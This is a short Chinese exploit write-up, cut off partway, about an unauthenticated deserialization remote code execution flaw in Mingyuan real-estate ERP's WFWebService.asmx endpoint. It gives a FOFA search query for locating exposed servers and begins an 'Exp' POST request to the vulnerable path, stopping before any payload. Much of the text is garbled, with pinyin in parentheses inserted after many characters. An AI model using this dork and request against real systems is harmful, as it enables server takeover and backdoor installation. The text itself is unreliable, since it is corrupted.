0x01 產(chǎn)品簡介

明源地產(chǎn)ERP是一款專為房地產(chǎn)行業(yè)設(shè)計的企業(yè)資源規(guī)劃（ERP）系統(tǒng)，系統(tǒng)集成了項目管理、財務(wù)管理、客戶關(guān)系管理、營銷管理等多個模塊，旨在幫助房地產(chǎn)企業(yè)提升運(yùn)營效率、降低成本和提高客戶滿意度。它充分考慮了房地產(chǎn)行業(yè)的特性和需求，通過整合企業(yè)的各個業(yè)務(wù)環(huán)節(jié)，實現(xiàn)信息的統(tǒng)一管理和高效協(xié)同。

0x02 漏洞概述

明源地產(chǎn)ERP WFWebService.asmx 接口處存在反序列化遠(yuǎn)程代碼執(zhí)行漏洞，未經(jīng)身份驗證的遠(yuǎn)程攻擊者可利用此漏洞執(zhí)行任意系統(tǒng)命令，寫入后門文件，獲取服務(wù)器權(quán)限。

0x03 復(fù)現(xiàn)環(huán)境

FOFA：

title="明源地產(chǎn)ERP"

0x04 漏洞復(fù)現(xiàn)

Exp

POST /MyWorkflowManagement/WebService/WFWebService.asmx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari